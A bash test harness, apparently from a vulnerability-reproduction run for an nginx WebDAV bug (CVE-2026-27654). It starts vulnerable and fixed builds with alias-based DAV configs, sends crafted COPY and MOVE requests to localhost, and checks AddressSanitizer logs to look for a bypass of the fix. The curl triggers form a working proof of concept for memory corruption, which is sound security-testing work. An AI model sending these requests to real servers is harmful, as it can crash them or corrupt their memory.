#!/bin/bash
set -euo pipefail

# Portable root detection - works anywhere
ROOT="${PRUVA_ROOT:-$(cd "$(dirname "$0")/.." && pwd)}"
LOGS="$ROOT/logs"
mkdir -p "$LOGS"

cd "$ROOT"

VULN_PREFIX="$ROOT/builds/nginx-vuln"
FIXED_PREFIX="$ROOT/builds/nginx-fixed"
DAV_ALIAS="$ROOT/dav-alias"
DAV_TMP="$ROOT/dav-tmp"

mkdir -p "$DAV_ALIAS" "$DAV_TMP"
echo "test" > "$DAV_ALIAS/src.txt"

# Kill any lingering nginx processes
pkill -9 nginx 2>/dev/null || true
sleep 1

NGINX_PID=""
cleanup() {
    if [[ -n "${NGINX_PID:-}" ]]; then
        kill -9 "$NGINX_PID" 2>/dev/null || true
        wait "$NGINX_PID" 2>/dev/null || true
    fi
}
trap cleanup EXIT

run_test() {
    local desc="$1"
    local nginx_bin="$2"
    local conf="$3"
    local trigger="$4"
    local asan_name="$5"

    echo ""
    echo "=== $desc ==="
    NGINX_PID=""
    rm -f "$LOGS/${asan_name}".*
    ASAN_OPTIONS="detect_leaks=0:log_path=$LOGS/${asan_name}" \
        "$nginx_bin" -p "$ROOT" -c "$conf" >"$LOGS/${asan_name}_stdout.txt" 2>"$LOGS/${asan_name}_stderr.txt" &
    NGINX_PID=$!
    sleep 1

    eval "$trigger" >"$LOGS/${asan_name}_curl.txt" 2>"$LOGS/${asan_name}_curl_err.txt" || true
    sleep 2
    kill -9 "$NGINX_PID" 2>/dev/null || true
    wait "$NGINX_PID" 2>/dev/null || true
    NGINX_PID=""

    if ls "$LOGS/${asan_name}".* >/dev/null 2>&1; then
        echo "[ASAN DETECTED] $desc"
    else
        echo "[NO ASAN] $desc"
    fi
}

# ── Config 1: Prefix location (original repro) ──
cat > "$ROOT/v1_test1.conf" <<'EOF'
daemon off;
master_process off;
worker_processes 1;
events { worker_connections 64; }
http {
    server {
        listen 8081;
        client_body_temp_path /root/.pruva/runs/cve-2026-27654_20260528-114500/dav-tmp;
        location /davvvv/ {
            alias /root/.pruva/runs/cve-2026-27654_20260528-114500/dav-alias/;
            dav_methods PUT DELETE MKCOL COPY MOVE;
            create_full_put_path on;
            dav_access user:rw group:rw all:r;
        }
    }
}
EOF

# ── Config 2: Exact match location ──
cat > "$ROOT/v1_test2.conf" <<'EOF'
daemon off;
master_process off;
worker_processes 1;
events { worker_connections 64; }
http {
    server {
        listen 8082;
        client_body_temp_path /root/.pruva/runs/cve-2026-27654_20260528-114500/dav-tmp;
        location = /davvvv {
            alias /root/.pruva/runs/cve-2026-27654_20260528-114500/dav-alias/;
            dav_methods PUT DELETE MKCOL COPY MOVE;
            create_full_put_path on;
            dav_access user:rw group:rw all:r;
        }
    }
}
EOF

# ── Config 3: Nested location ──
cat > "$ROOT/v1_test3.conf" <<'EOF'
daemon off;
master_process off;
worker_processes 1;
events { worker_connections 64; }
http {
    server {
        listen 8083;
        client_body_temp_path /root/.pruva/runs/cve-2026-27654_20260528-114500/dav-tmp;
        location /davvvv/ {
            alias /root/.pruva/runs/cve-2026-27654_20260528-114500/dav-alias/;
            dav_methods PUT DELETE MKCOL COPY MOVE;
            create_full_put_path on;
            dav_access user:rw group:rw all:r;
            location /davvvv/sub/ {
                alias /root/.pruva/runs/cve-2026-27654_20260528-114500/dav-alias/sub/;
                dav_methods PUT DELETE MKCOL COPY MOVE;
            }
        }
    }
}
EOF

# ── Config 4: Script alias ──
cat > "$ROOT/v1_test4.conf" <<'EOF'
daemon off;
master_process off;
worker_processes 1;
events { worker_connections 64; }
http {
    server {
        listen 8084;
        client_body_temp_path /root/.pruva/runs/cve-2026-27654_20260528-114500/dav-tmp;
        location /davvvv/ {
            alias /root/.pruva/runs/cve-2026-27654_20260528-114500/dav-alias/$http_host/;
            dav_methods PUT DELETE MKCOL COPY MOVE;
            create_full_put_path on;
            dav_access user:rw group:rw all:r;
        }
    }
}
EOF

echo "[*] Running variant tests against vulnerable build (release-1.29.6) ..."
run_test "Vuln: Prefix location COPY" "$VULN_PREFIX/sbin/nginx" "$ROOT/v1_test1.conf" \
    'curl -s --max-time 3 -X COPY http://127.0.0.1:8081/davvvv/src.txt -H "Destination: http://127.0.0.1:8081/xx"' \
    "vuln_prefix"
run_test "Vuln: Exact match COPY" "$VULN_PREFIX/sbin/nginx" "$ROOT/v1_test2.conf" \
    'curl -s --max-time 3 -X COPY http://127.0.0.1:8082/davvvv -H "Destination: http://127.0.0.1:8082/xx"' \
    "vuln_exact"
run_test "Vuln: Nested location COPY" "$VULN_PREFIX/sbin/nginx" "$ROOT/v1_test3.conf" \
    'curl -s --max-time 3 -X COPY http://127.0.0.1:8083/davvvv/sub/src.txt -H "Destination: http://127.0.0.1:8083/xx"' \
    "vuln_nested"
run_test "Vuln: Script alias COPY" "$VULN_PREFIX/sbin/nginx" "$ROOT/v1_test4.conf" \
    'curl -s --max-time 3 -X COPY http://127.0.0.1:8084/davvvv/src.txt -H "Destination: http://127.0.0.1:8084/xx" -H "Host: 127.0.0.1:8084"' \
    "vuln_script"
run_test "Vuln: MOVE method" "$VULN_PREFIX/sbin/nginx" "$ROOT/v1_test1.conf" \
    'curl -s --max-time 3 -X MOVE http://127.0.0.1:8081/davvvv/src.txt -H "Destination: http://127.0.0.1:8081/xx"' \
    "vuln_move"
run_test "Vuln: URL-encoded dest" "$VULN_PREFIX/sbin/nginx" "$ROOT/v1_test1.conf" \
    'curl -s --max-time 3 -X COPY http://127.0.0.1:8081/davvvv/src.txt -H "Destination: http://127.0.0.1:8081/%78%78"' \
    "vuln_urlenc"

echo ""
echo "[*] Running variant tests against fixed build (release-1.29.7) ..."
run_test "Fixed: Prefix location COPY" "$FIXED_PREFIX/sbin/nginx" "$ROOT/v1_test1.conf" \
    'curl -s --max-time 3 -w "\nHTTP_CODE:%{http_code}\n" -X COPY http://127.0.0.1:8081/davvvv/src.txt -H "Destination: http://127.0.0.1:8081/xx"' \
    "fixed_prefix"
run_test "Fixed: Exact match COPY" "$FIXED_PREFIX/sbin/nginx" "$ROOT/v1_test2.conf" \
    'curl -s --max-time 3 -w "\nHTTP_CODE:%{http_code}\n" -X COPY http://127.0.0.1:8082/davvvv -H "Destination: http://127.0.0.1:8082/xx"' \
    "fixed_exact"
run_test "Fixed: Nested location COPY" "$FIXED_PREFIX/sbin/nginx" "$ROOT/v1_test3.conf" \
    'curl -s --max-time 3 -w "\nHTTP_CODE:%{http_code}\n" -X COPY http://127.0.0.1:8083/davvvv/sub/src.txt -H "Destination: http://127.0.0.1:8083/xx"' \
    "fixed_nested"
run_test "Fixed: Script alias COPY" "$FIXED_PREFIX/sbin/nginx" "$ROOT/v1_test4.conf" \
    'curl -s --max-time 3 -w "\nHTTP_CODE:%{http_code}\n" -X COPY http://127.0.0.1:8084/davvvv/src.txt -H "Destination: http://127.0.0.1:8084/xx" -H "Host: 127.0.0.1:8084"' \
    "fixed_script"
run_test "Fixed: MOVE method" "$FIXED_PREFIX/sbin/nginx" "$ROOT/v1_test1.conf" \
    'curl -s --max-time 3 -w "\nHTTP_CODE:%{http_code}\n" -X MOVE http://127.0.0.1:8081/davvvv/src.txt -H "Destination: http://127.0.0.1:8081/xx"' \
    "fixed_move"
run_test "Fixed: URL-encoded dest" "$FIXED_PREFIX/sbin/nginx" "$ROOT/v1_test1.conf" \
    'curl -s --max-time 3 -w "\nHTTP_CODE:%{http_code}\n" -X COPY http://127.0.0.1:8081/davvvv/src.txt -H "Destination: http://127.0.0.1:8081/%78%78"' \
    "fixed_urlenc"

echo ""
echo "=== All variant tests completed ==="
echo "Check $LOGS/ for ASAN logs and HTTP responses."

# Exit 1 because no bypass was found (no ASAN on fixed version)
exit 1